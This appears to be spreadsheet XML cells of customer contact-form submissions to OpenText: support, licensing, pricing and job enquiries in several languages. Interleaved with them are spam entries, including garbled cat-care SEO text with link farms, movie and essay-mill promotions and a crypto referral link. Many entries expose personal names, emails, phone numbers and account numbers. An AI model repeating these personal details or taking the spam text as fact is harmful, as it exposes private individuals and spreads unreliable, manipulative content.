We are using Captaris FaxPress 2L (SN 61203721) with the software version 6.0.2003.3 to send out electronic faxes. I recently noticed that on some of the newer computers where I had to reinstall the software, we now get a watermark on each page stating: "To license contact: www.imgmaker.com". _x000D_
How can we get rid of this watermark?_x000D_
Thanks, Diego</t>
  </si>
  <si>
    <t xml:space="preserve"> 7817 related questions.&lt;br&gt; &lt;i&gt;Neuteringyoucrat InternationalCatCare&lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://cat-care-sheet.gq/cat-share-price/dan-the-carpet-man-roseville-ca-12.html]Dan the carpet man roseville ca[/url] [url=http://cat-care-sheet.gq/cat-stock-quote/ssscat-cat-training-aid-uk.html]Ssscat cat training aid uk[/url]  _x000D_
 &lt;h4&gt;5 Easy Ways to Control TerritorilCatSpraying Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt; CaatSymptomChecker . Is YourCatShowing Signs of Illness ... Your browser indicates if you've visited this link Whencatsbecome sick, they rely on us to be on the look out and seek help. PetCareRx created this helpful chart that tells you what eachsymptomcould mean.   More results.&lt;br&gt;  _x000D_
cat screaming loud _x000D_
 _x000D_
 How to BuildCattairs. House Pets How to BuildCatStairs. Read More. ... How Long DoAnimalSehlters KeeplAnimalsBefore Putting Them to Sleep? House Pets.&lt;br&gt; &lt;h3&gt; Is My Cat A Bengal?  Bengal Cats вЂ“ Bengals Illustrated &lt;/h3&gt;.&lt;br&gt;  _x000D_
  [url=http://cat-care-sheet.gq/cat-and-genny/how-to-train-persian-cat-for-toilet-14.html]How to train persian cat for toilet[/url] [url=http://cat-care-sheet.gq/pet-tracking-collar/45-cat-urine-odor-eliminate.html]Cat urine odor eliminate[/url]  _x000D_
 &lt;i&gt;How to Maked HomemadeCatDepellent Cuteness Your browser indicatese if you've visited this link&lt;/i&gt;.&lt;br&gt; Are you unsure about whatcatlitterto buy? Thetopcatlitterreviews on our website help you reach thebestfinal  BestratedCatlitters in 2017&lt;/h2&gt;.&lt;br&gt;  _x000D_
manx cats medical issues _x000D_
 _x000D_
Howcan I tell if mycat'sblladderis inflamed? My vet said ... Your browser indicates if you've visited this link Howcan I tell if mycat'ssbladderis ... Please tell mehowtofeelif hisbladderis emptying properly and anything else about  works:   More results.&lt;br&gt; &lt;h2&gt;How togetcaturine out ofclothes- Quora Your browser indicates if you've visited this link&lt;/h2&gt;.&lt;br&gt;  _x000D_
[url=http://cat-care-sheet.gq/getting-a-kitten/party-cat-2007.html]Party cat 2007[/url] [url=http://cat-care-sheet.gq/ca</t>
  </si>
  <si>
    <t>We will need the accounting email address.  We have an invoice with an old remit to address which we will need to be updated before it can be processed._x000D_
Thank you.</t>
  </si>
  <si>
    <t>Technical support with Rightfax</t>
  </si>
  <si>
    <t xml:space="preserve">I'm sourcing a content management solution for my firm. Please contact me to discuss potential solutions. </t>
  </si>
  <si>
    <t>quote for QTY 1_x000D_
EnCase® Forensic SMS 1 year_x000D_
OpenText - Part#: 310600010_x000D_
Contract Name: Open Market_x000D_
Contract #: Open Market_x000D_
Serial #: G2002081024/X100008100726_x000D_
Customer is NM-Human Services Department_x000D_
Customer Contact Info:Eric Marquez_x000D_
1301 Siler Road_x000D_
Building B/C_x000D_
SANTA FE, NM 87505_x000D_
United States_x000D_
Phone: 505-222-9376_x000D_
Email: Eric.Marquez@state.nm.us</t>
  </si>
  <si>
    <t>I need to find out if HCA/Eastside Medical Center (Snellville, GA) uses EASYLINK and has a current contract. And if "yes" who is the current account admin and how do we get added as an admin. If "no" then how do we go about getting an account established.</t>
  </si>
  <si>
    <t>we are searching for a tool to manage incoming work, distribution and reporting</t>
  </si>
  <si>
    <t>Graag asap meer informatie over OpenText Capture Center.</t>
  </si>
  <si>
    <t>when ever i click on Support -&gt;Knowledge Base , I get error message.  Application has encountered an error. Please contact connect@opentext.com.</t>
  </si>
  <si>
    <t xml:space="preserve">I can't use debug feature on MBPM 9.3 with visual c# 2010 express installed. I got a warning on Designer which says "Can't access Process Diagnostics Service information. Process debugging will be unavailable. Possible reason - missing permissions for current user.		</t>
  </si>
  <si>
    <t>Hi, could it be possible to know how much of breakout sessions will be available in English? Maybe I could get some list of these sessions._x000D_
Thank you!_x000D_
Best regards, _x000D_
Alina Bruge</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrtes Damen und Herren,_x000D_
_x000D_
wir haben schon seit einiger Zeit den Open Text Content Server als Dokumentenmanagementsystem und diverse SAP-Systeme unabhängig voneinander im Einsatz. Aufgrund unserer Migration auf S/4-HANA beschäftigen wir uns momentan auch mit einer Integration des Content Managements in S/4-HANA. Nach diversen Recherchen im Internet sind noch einige Fragen zu der von Ihnen angebotenen Extended ECM Lösung aufgekommen:_x000D_
Ist die Integration des Content Servers nur in vorgegebenen Geschäftsprozessen in S/4-HANA möglich oder ist auch ein Einsatz z.B. in Eigenentwicklungen denkbar?_x000D_
Wie werden die Dokumente in den Geschäftsprozess eingebunden? Funktioniert der Upload / Download der Dokumente vom Content Server oder Filesystem oder  beides?_x000D_
_x000D_
Vielen Dank im Voraus und Freundliche Grüße_x000D_
_x000D_
Marc Haselhoff_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please note that we are unable to send out email to designated fax number_x000D_
ashore._x000D_
Can you please assist with this matter and let us know what is the problem?_x000D_
 _x000D_
Have been using the same method for many years and this is the first time we_x000D_
encounter such difficulty._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am a IT consultant with more than 25 years of experience in the IT and ITES sector in India. _x000D_
I want to join your organization and help contribute to the Sales Team. _x000D_
Please guide me accordingly. </t>
  </si>
  <si>
    <t>We have three users in our Chicago office that continue to get a 5097 error when they try to save documents.  These three users use the DM footer Add-in, and I believe they are the only ones that do.  If they save their documents in .doc format they don't have a problem, but saving as a .docx with xml data seems to cause a problem.  If we take out xml data, they can save, but if their is any xml in the document they get an error when trying to save and have to change to .doc format.</t>
  </si>
  <si>
    <t>I cannot download my procured OpenText Brava! Enterprise and related license file via my login account itot_lic_admin_02@judiciary.hk.  My end user number is 10006238.  Would you please help to investigate this issue.  Many thanks</t>
  </si>
  <si>
    <t>Can you please provide a direct contact person that handles verification of employment?</t>
  </si>
  <si>
    <t>Open a support ticket. Currently looking for a solution to allow export of faxes from RightFax.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a customer looking for Opentext content server/livelink licenses. They would need approximate pricing for Full user and read only user licenses._x000D_
_x000D_
Thanks,_x000D_
Luke Michalski, ISE_x000D_
</t>
  </si>
  <si>
    <t>I am curious about your DAM solution - looking to find out more about it.</t>
  </si>
  <si>
    <t>Привет всем участникам! класный у вас сайт! _x000D_
Нашел интересную базу кино:  [b] Лучшие фантастика 2017 бесплатно [/b] [url=http://kinobunker.net/]http://kinobunker.net/[/url] _x000D_
Тут: http://kinobunker.net/main/3085-na-sahaline-prohodit-mezhdunarodnyy-kinofestival-kray-sveta.html На Сахалине проходит международный кинофестиваль «Край света» _x000D_
Тут: http://kinobunker.net/komediya/10883-slavnye-parni-the-nice-guys-2016.html _x000D_
Тут: http://kinobunker.net/fantastika/ Лучшая фантастика список 2017 _x000D_
Тут: [url=http://kinobunker.net/istoricheskiy/] Лучшие исторические фильмы 2017 бесплатно [/url] _x000D_
Здесь: [url=http://kinobunker.net/uzhasy/] 2017 список лучшие ужасы [/url] 2017 список лучшие ужасы</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
I had registered , but do not have a tab to download the software for  OpenText Order # 8000009978    PO Number: 1745133_x000D_
_x000D_
_x000D_
thanks_x000D_
 _x000D_
Venkat Lellapalli_x000D_
</t>
  </si>
  <si>
    <t>Would like to compare your Digital Asset products to see if they fit the needs of our team</t>
  </si>
  <si>
    <t>Hello-_x000D_
_x000D_
We recently tried to reset our password, but believe that you have the incorrect contact person, because we never received the "reset"._x000D_
_x000D_
You may have Tara Shuler as a contact, but the contact people should be:_x000D_
_x000D_
Noelia Nava_x000D_
noelia@barefootdreams.com_x000D_
_x000D_
Jackie Cannon_x000D_
jackie@barefootdreams.com</t>
  </si>
  <si>
    <t>I have an efax number and we recently changed our email domain from @delphi.com to @aptiv.com and I need to get the efax number updated but I don't know how and my Purchasing department who set this up has no idea as well.  Any help  would be greatly appreciated!  My old email address is lesley.l.marcott@delphi.com and my new email address is lesley.l.marcott@aptiv.com.  My efax number is 866-741-1644.  Thank you!!</t>
  </si>
  <si>
    <t>I am researching options for compliance with the NY DFS Cyber Security requirements for protecting Non-public Information._x000D_
Kurt Schuler x 652  Project Manager</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We kindly request a OpenText Content Suite demo and evaluation._x000D_
Please, let us know your convenient date and time for next week. We suggest 8:00 AM or 9:00 AM (Colombian Time GMT -5)._x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Rafael Niebles_x000D_
Sales Manager_x000D_
rafael.niebles@ipmconsulting.net_x000D_
Phone: +57 312-523-3944_x000D_
www.ipmconsulting.net</t>
  </si>
  <si>
    <t xml:space="preserve"> We're in the process of implementing OnBase and pricing their Brainware product for unstructured automatic indexing. I'm looking for a comparable product and would like to compare pricing and features.</t>
  </si>
  <si>
    <t>i need to open .step files and opentext brava desktop xl is telling me - Model format is not licensed - so what do i need to do to open this?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I don't have access anymore to my support with my credentiel for account GDFSUEZ. Could you fix this issue please ?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Nicolas</t>
  </si>
  <si>
    <t>I recently upgraded my report builder and received 1 license which does not work._x000D_
I also need to purchase 2 more licenses._x000D_
Thanks_x000D_
Antonino Pansera_x000D_
IT Manager_x000D_
Cubbison Company</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, my name is Unai Isusi and I work in Teknei company._x000D_
_x000D_
I have a problem when I confirm the registration: I receive your ‘Registration Confirmation’ email, select the ‘Confirm Registration’ link, and then I access to your Support Web and a page is displayed with the text 'No Access' _x000D_
_x000D_
However, I can access to knowledge cetner, I can download software, but I can't send 'Tickets'. _x000D_
I have repeated this steps several times getting the same problem. Could you find the solution?_x000D_
_x000D_
Additionally, I need to be linked to the next accounts:_x000D_
•	Openbank, whose id is 10415092                                             _x000D_
•	TEKNE INFORMATION TECHNOLOGY SL, whose ID is 10415115                                   _x000D_
•	TEKNEI 10415257                                         _x000D_
_x000D_
Thanks in advance, _x000D_
_x000D_
Unai Isusi Larrauri_x000D_
Consultor_x000D_
_x000D_
TEKNEI ESPAÑA_x000D_
C/ Zugatzarte Etorbidea, 32_x000D_
Departamento 1.12_x000D_
48930 Getxo, Bizkaia_x000D_
www.teknei.com_x000D_
_x000D_
Tel. oficina: +(34) 946 038 311_x000D_
Tel. móvil: +(34) 650 493 334_x000D_
email: uisusi@teknei.com_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">on the 23 of December 2017    I   bought from you     Avast Premier 1 PC/1 rok Metoda dostawy: Pobierz       miałam otrzymać link aktywacyjny   I was to receive the mail  within 10 minutes.  I have not received the activation link still.  Please send me the link once again on the addresses  magda.saar@gmail.com,    brightcamomile@wp.pl          If  you can't give me the link, then  sent me back the money.     My number of order: A0010199199.    Either way my bank will contact you or the police. _x000D_
Best regards, _x000D_
Magdalena Saar  </t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
i would like to know more on the OpenText ECM and WEM Tool trainings._x000D_
Please provide more details._x000D_
_x000D_
Thanks_x000D_
Regards,_x000D_
Chaya_x000D_
</t>
  </si>
  <si>
    <t>Is Intellicon Systems an existing member of OTC's  Global Partner Program?</t>
  </si>
  <si>
    <t>Need to know the technical certifications available</t>
  </si>
  <si>
    <t>Asking the quotation of OpenText Exstream.</t>
  </si>
  <si>
    <t>Kindly need support for actuate provider in the united arab emirates._x000D_
_x000D_
Rgds,_x000D_
Yahya</t>
  </si>
  <si>
    <t>Hello , I am from inditex / Zara and user of your tempo box application . We need update for ios 11 as soon as possible . Can you keep me update for the date ? Thanks</t>
  </si>
  <si>
    <t>Привет всем! интересный у вас сайт! _x000D_
Нашел интересную базу кино:  [url=http://kinobunker.net/]Новинки в хорошем качестве hd лучшие комедии[/url] _x000D_
Тут: http://kinobunker.net/detektiv/2089-prestupnye-svyazi-gang-related-sezon-1-2014.html Смотреть Преступные связи / Gang Related (Сезон 1) (2014) онлайн бесплатно _x000D_
Здесь: http://kinobunker.net/main/5041-premera-dublirovannogo-treylera-komedii-shpion.html _x000D_
Тут: http://kinobunker.net/fantastika/ В хорошем качестве hd лучшая фантастика _x000D_
Тут: [url=http://kinobunker.net/uzhasy/] Лучшие ужасы в хорошем качестве [/url] _x000D_
Тут: [url=http://kinobunker.net/fantastika/] 2017 в хорошем качестве лучшие фантастика [/url] 2017 в хорошем качестве лучшие фантастика</t>
  </si>
  <si>
    <t>Would like whoever is our account manager to contact me regarding our account #090554-001. Thanks</t>
  </si>
  <si>
    <t>I am looking for the release date of  OpenText   Portal 16.2</t>
  </si>
  <si>
    <t xml:space="preserve">Prices for eDOCS license </t>
  </si>
  <si>
    <t>alaa.abdel-azim@leoni.com</t>
  </si>
  <si>
    <t>I would like to get a demo of the CMS.</t>
  </si>
  <si>
    <t>Do you have documentum reseller in Malaysia ? Thanks.</t>
  </si>
  <si>
    <t>Enquiry on Library Management Solution._x000D_
We are interested in finding out more about the library management system that your company offers for our library. _x000D_
_x000D_
Do you have any brochures so that we can find out more ? We would also like to have a demo so that our users can take a look at the solutions available._x000D_
_x000D_
Thanks !</t>
  </si>
  <si>
    <t>Buy and sell bitcoins BTC, EUR, USD, XAU, DASH, ETH, XEM anytime _x000D_
https://spectrocoin.com/en/signup.html?referralId=915166824 _x000D_
Instant exchange, use your funds immediately _x000D_
150+ countries and 30+ currencies supported _x000D_
20+ deposit and withdrawal methods are available.</t>
  </si>
  <si>
    <t xml:space="preserve"> Researchers comparing the genomes ofdomesticcatswith that of wild elines reveal the genetic underpinnings ofdomestication . It appears that the convers.&lt;br&gt; It's always shocking to me when I see an extremelysick cat , while he owner has not ... If yourcatseems tosleepall day when he used to be active, he may  &lt;i&gt; Sick Cat Symptoms  LoveToKnow &lt;/i&gt;.&lt;br&gt;  _x000D_
 [url=http://pet-cat-accessories.ml/cat-whisperer/48-why-is-my-cat-acting-weird-after-the-vet.html]Why is my cat acting weird after the vet[/url] [url=http://pet-cat-accessories.ml/kitten-sneezing/134-indoor-cat-houses-for-sale.html]Indoor cat houses for sale[/url]  _x000D_
 Browse Cat Toys and 1000s of other products in our Cat section at Europe's Leading Online Pet  Cat Toys: great selection at zooplus&lt;/strong&gt;.&lt;br&gt; Find and save ideas  about Tabbykittens for saleon Pinterest.  Sese more ... Seal mink spotted tabby bengal cat by zawieco bengals.  Tabby Cat ..&lt;br&gt;  _x000D_
Male cat peed blood _x000D_
 _x000D_
 Here are some signs of stress you'll want to watch out for in your cat, especially if they occur  to Reduce Stress in Cats (with Pictures) - wikiHow&lt;/h3&gt;.&lt;br&gt; &lt;h4&gt;CatTalesZoological Park - Mead, WA  Groupon Your browser indicates if you've visited this link&lt;/h4&gt;.&lt;br&gt;  _x000D_
  [url=http://pet-cat-accessories.ml/cat-whisperer/136-will-steam-cleaning-carpet-get-rid-of-cat-urine-smell.html]Will steam cleaning carpet get rid of cat urine smell[/url] [url=http://pet-cat-accessories.ml/cat-whisperer/41-how-to-litter-train-an-older-cat.html]How to litter train an older cat[/url]  _x000D_
 eFlineIdiopathicCytsitis ,Cats The BIG EASY Animal Hospital Your browser indicates if you've visited this link FelineIdiopathicCystiitsOverview. Felineidiopathiccystitis(FIC) is an inflammation of the urinary bladder. ... FIC affects bothmaleand femalecats , ...   More results.&lt;br&gt; &lt;h4&gt;HowCan I Get Pet Odors Out Of MyCouch ? -  Your browser indicates if you've visited this loink&lt;/h4&gt;.&lt;br&gt;  _x000D_
Cat illness symptoms diarrhea _x000D_
 _x000D_
&lt;h3&gt;Pushing Cat- Video Results&lt;/h3&gt;.&lt;b</t>
  </si>
  <si>
    <t>Need to get access to Documentum 7.3 developer edition download.</t>
  </si>
  <si>
    <t>Dear Sir, _x000D_
we are evaluation some LMS solutions for our corporate need, we would like to have a demo access for your LMS for testing and evaluation, _x000D_
we would like to know if you offer off the shelf ready training content to be used for company needs as well the ability to load our own contents   _x000D_
_x000D_
Regards_x000D_
Ahmed Algharawy</t>
  </si>
  <si>
    <t xml:space="preserve">We want to implement CLOUD FAXING immediately for a site,please contact </t>
  </si>
  <si>
    <t>◇◆◇◆◇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
　　　　『働き方改革』のお手伝いをしています！_x000D_
──────────────────────────────────────────────_x000D_
キャリアシステムはこの2年で151社へのお手伝いを成功させています。_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇◆◇◆◇_x000D_
_x000D_
突然のメール失礼致します。_x000D_
このたびは貴社のホームページを拝見してご連絡させて頂きました。_x000D_
株式会社キャリアシステムと申します。_x000D_
_x000D_
昨今、各企業様が様々な働き方改革を実施しています。_x000D_
急速な変革をするビジネスシーンにおいて、旧態然とした体制に歪みがきています。_x000D_
そんな世の中に対応すべく、これから加速していく「働き方改革」を是非お手伝いさせてください。_x000D_
_x000D_
下記に、当社にご相談いただいた中からもっとも多い事例を3つ紹介いたします。_x000D_
ピンときたら、是非キャリアシステムにご連絡ください。_x000D_
_x000D_
＜実例その1＞　～営業編～　━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
--課題1--　営業マンが採用できない！_x000D_
--課題2--　属人的な体制から脱却できない！_x000D_
──────────────────────────────────────────────_x000D_
　　　　【営業職】・・・営業マンの業務を切り分け！_x000D_
──────────────────────────────────────────────_x000D_
　　⇒　キャリアシステムにお問合せください！！_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇◆◇◆◇_x000D_
_x000D_
＜実例その2＞　～開発編～　━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
--課題1--　開発技術者がとにかく足りない！_x000D_
--課題2--　効率化がなかなか進まない！_x000D_
──────────────────────────────────────────────_x000D_
　　　　【開発現場】・・・開発技術者の業務を切り分け！_x000D_
──────────────────────────────────────────────_x000D_
　　⇒　キャリアシステムにお問合せください！！_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇◆◇◆◇_x000D_
_x000D_
＜実例その3＞　～Webマーケティング編～　━━━━━━━━━━━━━━━━━_x000D_
--課題1--　更新作業、メルマガなど継続的にやりたい！_x000D_
--課題2--　とにかくマーケティング戦略をもっと加速させたい！_x000D_
──────────────────────────────────────────────_x000D_
　　　　【Webマーケティング】・・・Webマーケの業務を切り分け！_x000D_
──────────────────────────────────────────────_x000D_
　　⇒　キャリアシステムにお問合せください！！_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇◆◇◆◇_x000D_
_x000D_
_x000D_
★弊社には様々な事例があります。貴社のケースに則したご提案をいたします。_x000D_
_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━_x000D_
株式会社キャリアシステム 　東京支店_x000D_
担当：横山、佐藤_x000D_
cs-contact@919.jp_x000D_
_x000D_
〒107-0052 東京都港区赤坂2-11-7 ATT新館_x000D_
TEL：03-5574-7333_x000D_
フリーコール：0120-505-169_x000D_
_x000D_
「キャリアシステムHP」：https://www.career-system.net/_x000D_
「派遣deパート」：https://www.parthaken.jp/_x000D_
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</t>
  </si>
  <si>
    <t>We imagine that barely a professional paragrapher can ship speculative size that’s nothing stubby of perfect [url=http://perfectessaywriter.com/write-papers/how-you-can-create-the-movie-bibliography/]http://perfectessaywriter.com/write-papers/how-you-can-create-the-movie-bibliography/[/url] and brings the largest results. Dr. zak case study on depression. Every online attempt writer in our network has a foul track-record of providing fact-finding and penmanship benefit to students. Project management in bangladesh term paper</t>
  </si>
  <si>
    <t>HI Team,_x000D_
I am looking for the job in Networking domain. I have 2.5 year of Exp. in Wipro Technologies_x000D_
please let me know if any job opportunity._x000D_
_x000D_
Regards,_x000D_
Deepanshu</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;i&gt;Howtostopcatsspraying ? - FeliwayВ® forcats Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; Howtostopdestructivechewingbehaviour incats Your browser indicates if you've visited this link There are many reasaonsfor destructivechewingbehaviour incats . Find out the cauuses andhowyou canstopthis harmful behaviour and keep yourcatsafe.   More results.&lt;br&gt;  _x000D_
 [url=http://organic-cat-litter.tk/constipated-kitten/95-complete-cat-care.html]Complete cat care[/url] [url=http://organic-cat-litter.tk/picture-of-cats/4-cat-scratch-fever-treatment-cdc.html]Cat scratch fever treatment cdc[/url]  _x000D_
 23 РјР°СЏ 2017 Рі. -Allcat urine smellssomewhat like ammonia as ammonia is a natural product of  To Find That Cat Pee Smell -  Community&lt;/h2&gt;.&lt;br&gt; May 18, 2016 - Check out the Top 13 GPS Tracking Devices for cats and dogs of 2016  Winnber WOW!!!!- The Paw Tracker because they have 3 Color  Radio Frequency is Better than GPS for a Cat Tracker Device&lt;/h2&gt;.&lt;br&gt;  _x000D_
How to keep catx off plants _x000D_
 _x000D_
 &lt;h3&gt;Cat Diarrhea  CatHealth .comm&lt;/h3&gt;.&lt;br&gt; Bengalcats - pets - Craigslist Your browser indicates if you've visited this link 2bengalcats 1 male 1 female, male is a little over 1 year female a little over 2years and was a breeder cat. They are very cautious and take weeks to trust you but ...   More results.&lt;br&gt;  _x000D_
  [url=http://organic-cat-litter.tk/wild-cat-names/70-uv-light-cat-urine-detector.html]Uv light cat urine detector[/url] [url=http://organic-cat-litter.tk/kitten-scratch-post/60-best-indoor-cat-litter.html]Best indoor cat litter[/url]  _x000D_
 TheBengalCatDirectory - Resource forBengalCats , Kittens ... Your browxer indicates if you've visited this link TheBengalCatDirectory was created to help youfnidBengalCatbreeders in your area, or if you are looking for something very specific,findwhich breeders may ...  More rresults.&lt;br&gt; 10 CommonCatBehaviorsExplained  KarmaCat+ Zen Dog Your browser indicates if you've visited this link Why docatsdo the things thet do? Read on to dis</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, my name is Tylor._x000D_
I am a second year of college student who are studying user interactions._x000D_
I want to ask if there is a chance to experience OpenText demo tools _x000D_
for understanding of the user flows with your products. _x000D_
Thank you Merry Christmas!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I have upgraded one of our users computer from a Windows 7 PC to a Windows 10 PC. He was using Brava Desktop. I downloaded Brava Desktop TXL for him, but when he tries to open file, he gets error "Invalid license. Unable to load files. The MAC address in the license file does not match any MAC address on this computer". What do I need to do to get his license from his old computer to work on his new computer? Thanks</t>
  </si>
  <si>
    <t xml:space="preserve"> Even when youвЂ™ve lived with them for years, cat behavior can b weird, and sudden changes can be frustrating. It can seem like your misbehaving cat wants to ruin  this article about 10 weird cat beahviors as cat communication, and what they mean. Learn why cats perform these weird cat  Cat Acting Strangely (eating, smells, food, meows) - Cats ... &lt;/u&gt;.&lt;br&gt; With his distinctive spotted coat and large size, the Bengal looks like a wild cat on the prowl, but although one of his ancestors is the samll, wild Asian leopard  Cats Picture Gallery - The Spruce&lt;/strong&gt;.&lt;br&gt;  _x000D_
 [url=http://cat-encyclopedia.ml/bengal-cat-size/19-cat-howling-at-night-how-to-stop.html]Cat howling at night how to stop[/url] [url=http://cat-encyclopedia.ml/cat-sign-language/16-my-kitten-pees-on-my-bed.html]My kitten pees on my bed[/url]  _x000D_
 &lt;i&gt;PDFWhyDoAnimalsoD ?theWayThey- University of Arizona Your browser indicates if you've visited this link&lt;/i&gt;.&lt;br&gt; How to Remove theSmellofCat Urinefrm RunningShoes . Kitty got it really wrong when he decided to pee on your favourite runningshoes ... Never fear, here is how  to removeurien smellfromshoes-  embedded.&lt;br&gt;  _x000D_
Caterpillar inc address _x000D_
 _x000D_
 &lt;h2&gt;The Most PopularKittenNamesof 2015 -  is the ... Your browser indicates if you've visited this link&lt;/h2&gt;.&lt;br&gt; Now I don't know if they are actually playing orfighting . ... goes after her like he hides and she comes by qnd  to Stop Cats From Fighting - &lt;/i&gt;.&lt;br&gt;  _x000D_
  [url=http://cat-encyclopedia.ml/tiger-kitten/22-cream-tabby-cat.html]Cream tabby cat[/url] [url=http://cat-encyclopedia.ml/magnetic-cat-flap/8-how-to-make-cat-stop-meowing-in-car.html]How to make cat stop meowing in car[/url]  _x000D_
 21 РґРµРє. 2012 Рі. -My girlcat- who was ill not too long ago -has recently startedpeeingon thefloor . She seems to have preferred spots to relieve herself,  year old cat is peeing inside the house вЂ” Penny Arcade&lt;/strong&gt;.&lt;br&gt; &lt;h2&gt;10 Best Dog DentalChews&amp; Treats in 2017  Dog CatDental Care Your borwser indicates if</t>
  </si>
  <si>
    <t>Escribo, porque estamos interesados en ser Partners de OpenText._x000D_
Contamos con experiencia implementando soluciones con la plataforma Documentum por casi 10 años con diferentes clientes en México, y queremos buscar la oportunidad de poder ofrecer la oportunidad a nuestro clientes._x000D_
Por su atención muchas gracias.</t>
  </si>
  <si>
    <t xml:space="preserve">Please email me the contact person and availability for conversation about your MIM product. </t>
  </si>
  <si>
    <t>Product inquiry</t>
  </si>
  <si>
    <t>I have tried unsuccessfully several times this week to download the Gartner Quadrant for Content Services.  Your application tells me that I will be recieving an email, but one never comes.  Thank you.</t>
  </si>
  <si>
    <t>We believe that alone a able correspondent can cunning academic size that’s nothing abbreviated of best [url=http://hqessay.com/write-papers/guidance-for-you-personally-following-worldwide-heating-documents/]http://hqessay.com/write-papers/guidance-for-you-personally-following-worldwide-heating-documents/[/url] and brings the best results. Qualities of a good business research paper. Every online composition journo in our network has a antagonistically track-record of providing check in and writing assistance to students. Military pay for overseas assignments</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Company is BellMTS_x000D_
contract # = 0011018070_x000D_
End User Code = EU0019697_x000D_
(Opentext has us listed as MTS Inc.)_x000D_
_x000D_
I am interested to learn more about our capabilities and entitlements to enable real time retrieval of bill/invoice that are archived from SAP (We have the SAP Doculink solution) for an internal web application. _x000D_
 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am requesting employment information.  I would like to know if you are hiring in your Tallahassee, Florida office; under any entry level job position or in the custodian department.  If you are please email me with the information.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Connection Information for linking an Open text 2100 unit -- To Nortel CS-1000 using -T1/PRI digital connection </t>
  </si>
  <si>
    <t>Hi, can you please enable me for Partner Access. Thank you. A.Wastl_x000D_
---_x000D_
The individuals can request that themselves by contacting OT Customer Support (guide attached), asking to get PARTNER Access for Partner Portal, My Support and Learning Central (it’s all one log in), _x000D_
stating clearly your partner organisations name and their individual first name and surname._x000D_
 _x000D_
Kind regards / Freundliche Grüsse_x000D_
Simone Harding_x000D_
Partner Desk Manager - Europe | Global Partner Program_x000D_
---</t>
  </si>
  <si>
    <t>(1) My Account was migrated from EMC , which shows 457 Discussions and 1038 Comments.  _x000D_
The URL :- https://communities.opentext.com/forums/profile/discussions/91976/saswata_x000D_
_x000D_
(2) I clicked “ Sign In ” , and after entering my credentials the site shows me a different user account , where my Discussions and Comments are missing. _x000D_
The URL :- https://communities.opentext.com/forums/profile/discussions/517519/saswatamandal_x000D_
_x000D_
I want to access my old user account that was migrated from EMC  :- _x000D_
https://communities.opentext.com/forums/profile/discussions/91976/saswata_x000D_
_x000D_
Please help._x000D_
_x000D_
Thanks &amp; Regards_x000D_
Saswata Mandal_x000D_
919831316466</t>
  </si>
  <si>
    <t>kindly provide urls for testing</t>
  </si>
  <si>
    <t xml:space="preserve">Suche einen Kontakt zu einem Verantwortlichen im Marketing / Produckt Marketing für das Thema AI und für das OT Produkt Magellan.  </t>
  </si>
  <si>
    <t>Curso de VIM.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Could you please let me know if LegalKEY is supported on Windows Server 2016 and SQL Server 2016?_x000D_
_x000D_
I did try downloading more information from https://www.opentext.com/connect/global/sso_download_protected?docpath=product/legalkey/legalkey_rm_po.pdf, but the following message was displayed:_x000D_
_x000D_
ERROR: FILE NOT FOUND_x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards_x000D_
John Carson</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren von OpenText, _x000D_
_x000D_
ich habe eine wohl etwas ungewöhnliche Anfrage, aber ich hoffe Sie können mir trotzdem weiterhelfen. Und zwar geht es um einen Werbeartikel von Ihnen, der mir zufällig in die Hände gefallen ist. Er war beschriftet mit "optentext - business network" mit gezeichnetem Testimonial "Anthony". Der Artikel war in Form eines kleinen Folders in DinA5. Beim Aufklappen erschien ein kleiner Bildschirm, der sich automatisch eingeschaltet hat und ein kurzes Werbevideo mit Ton abgespielt hat. Ich fand die Idee einfach klasse, und auch wenn ich die falsche Zielgruppe für Ihr Unternehmen bin, würde ich mich freuen, wenn Sie mir verraten könnten, wo Sie dieses Werbemittel produzieren ließen, bzw. wer so etwas anbietet. _x000D_
_x000D_
Ich danke Ihnen für Ihre Hilfe und wünsche schöne, erholsame Weihnachten und einen guten Rutsch ins neue Jahr!_x000D_
_x000D_
Anna Scholz_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I'd like someone to arrange a visit to discuss switching to OpenText for our EDI connectivity, sometime in the new year, after Jan 2nd 2018. We're currently with another provider and would need to carefully manage the migration.</t>
  </si>
  <si>
